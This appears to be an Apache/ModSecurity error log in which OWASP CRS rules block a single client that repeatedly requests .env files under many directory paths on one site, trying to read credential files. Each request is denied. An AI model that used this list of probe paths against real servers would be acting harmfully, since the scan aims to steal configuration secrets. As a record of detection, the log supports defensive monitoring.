[Mon May 11 16:54:18.161477 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/core/app/.env"] [unique_id "agHtmoW8yzYoWG_eyCWiCwAAAVI"]
[Mon May 11 16:54:18.161717 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/core/app/.env"] [unique_id "agHtmoW8yzYoWG_eyCWiCwAAAVI"]
[Mon May 11 16:54:18.295185 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /config/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/config/.env"] [unique_id "agHtmoW8yzYoWG_eyCWiDQAAAVI"]
[Mon May 11 16:54:18.295393 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/config/.env"] [unique_id "agHtmoW8yzYoWG_eyCWiDQAAAVI"]
[Mon May 11 16:54:18.295641 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/config/.env"] [unique_id "agHtmoW8yzYoWG_eyCWiDQAAAVI"]
[Mon May 11 16:54:18.562104 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /private/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/private/.env"] [unique_id "agHtmoW8yzYoWG_eyCWiDwAAAVI"]
[Mon May 11 16:54:18.562355 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/private/.env"] [unique_id "agHtmoW8yzYoWG_eyCWiDwAAAVI"]
[Mon May 11 16:54:18.562616 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/private/.env"] [unique_id "agHtmoW8yzYoWG_eyCWiDwAAAVI"]
[Mon May 11 16:54:18.723730 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /application/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/application/.env"] [unique_id "agHtmoW8yzYoWG_eyCWiEQAAAVI"]
[Mon May 11 16:54:18.723946 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/application/.env"] [unique_id "agHtmoW8yzYoWG_eyCWiEQAAAVI"]
[Mon May 11 16:54:18.724210 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/application/.env"] [unique_id "agHtmoW8yzYoWG_eyCWiEQAAAVI"]
[Mon May 11 16:54:19.010960 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /bootstrap/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/bootstrap/.env"] [unique_id "agHtm4W8yzYoWG_eyCWiEwAAAVI"]
[Mon May 11 16:54:19.011227 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/bootstrap/.env"] [unique_id "agHtm4W8yzYoWG_eyCWiEwAAAVI"]
[Mon May 11 16:54:19.011485 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/bootstrap/.env"] [unique_id "agHtm4W8yzYoWG_eyCWiEwAAAVI"]
[Mon May 11 16:54:19.109771 2026] [authz_core:error] [pid 1411055:tid 1411072] [client 75.119.155.172:2198] AH01630: client denied by server configuration: /home/castigli/public_html/wp-content/plugins/wordpress-seo/vendor_prefixed/ruckusing/lib/Ruckusing/Adapter/Sqlite3/error_log
[Mon May 11 16:54:19.164710 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /database/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/database/.env"] [unique_id "agHtm4W8yzYoWG_eyCWiFAAAAVI"]
[Mon May 11 16:54:19.164930 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/database/.env"] [unique_id "agHtm4W8yzYoWG_eyCWiFAAAAVI"]
[Mon May 11 16:54:19.165184 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/database/.env"] [unique_id "agHtm4W8yzYoWG_eyCWiFAAAAVI"]
[Mon May 11 16:54:19.318803 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /storage/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/storage/.env"] [unique_id "agHtm4W8yzYoWG_eyCWiFgAAAVI"]
[Mon May 11 16:54:19.319026 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/storage/.env"] [unique_id "agHtm4W8yzYoWG_eyCWiFgAAAVI"]
[Mon May 11 16:54:19.319277 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/storage/.env"] [unique_id "agHtm4W8yzYoWG_eyCWiFgAAAVI"]
[Mon May 11 16:54:19.453647 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /var/www/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/var/www/.env"] [unique_id "agHtm4W8yzYoWG_eyCWiFwAAAVI"]
[Mon May 11 16:54:19.453873 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/var/www/.env"] [unique_id "agHtm4W8yzYoWG_eyCWiFwAAAVI"]
[Mon May 11 16:54:19.454116 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/var/www/.env"] [unique_id "agHtm4W8yzYoWG_eyCWiFwAAAVI"]
[Mon May 11 16:54:19.577245 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /var/www/html/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/var/www/html/.env"] [unique_id "agHtm4W8yzYoWG_eyCWiGQAAAVI"]
[Mon May 11 16:54:19.577492 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/var/www/html/.env"] [unique_id "agHtm4W8yzYoWG_eyCWiGQAAAVI"]
[Mon May 11 16:54:19.577725 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/var/www/html/.env"] [unique_id "agHtm4W8yzYoWG_eyCWiGQAAAVI"]
[Mon May 11 16:54:19.702042 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /current/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/current/.env"] [unique_id "agHtm4W8yzYoWG_eyCWiGgAAAVI"]
[Mon May 11 16:54:19.702284 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/current/.env"] [unique_id "agHtm4W8yzYoWG_eyCWiGgAAAVI"]
[Mon May 11 16:54:19.702536 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/current/.env"] [unique_id "agHtm4W8yzYoWG_eyCWiGgAAAVI"]
[Mon May 11 16:54:19.861146 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /release/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/release/.env"] [unique_id "agHtm4W8yzYoWG_eyCWiHAAAAVI"]
[Mon May 11 16:54:19.861423 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/release/.env"] [unique_id "agHtm4W8yzYoWG_eyCWiHAAAAVI"]
[Mon May 11 16:54:19.861743 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/release/.env"] [unique_id "agHtm4W8yzYoWG_eyCWiHAAAAVI"]
[Mon May 11 16:54:20.090003 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /releases/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/releases/.env"] [unique_id "agHtnIW8yzYoWG_eyCWiHQAAAVI"]
[Mon May 11 16:54:20.090232 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/releases/.env"] [unique_id "agHtnIW8yzYoWG_eyCWiHQAAAVI"]
[Mon May 11 16:54:20.090469 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/releases/.env"] [unique_id "agHtnIW8yzYoWG_eyCWiHQAAAVI"]
[Mon May 11 16:54:20.298462 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /shared/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/shared/.env"] [unique_id "agHtnIW8yzYoWG_eyCWiHgAAAVI"]
[Mon May 11 16:54:20.298691 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/shared/.env"] [unique_id "agHtnIW8yzYoWG_eyCWiHgAAAVI"]
[Mon May 11 16:54:20.298953 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/shared/.env"] [unique_id "agHtnIW8yzYoWG_eyCWiHgAAAVI"]
[Mon May 11 16:54:20.519249 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /deploy/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/deploy/.env"] [unique_id "agHtnIW8yzYoWG_eyCWiHwAAAVI"]
[Mon May 11 16:54:20.519461 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/deploy/.env"] [unique_id "agHtnIW8yzYoWG_eyCWiHwAAAVI"]
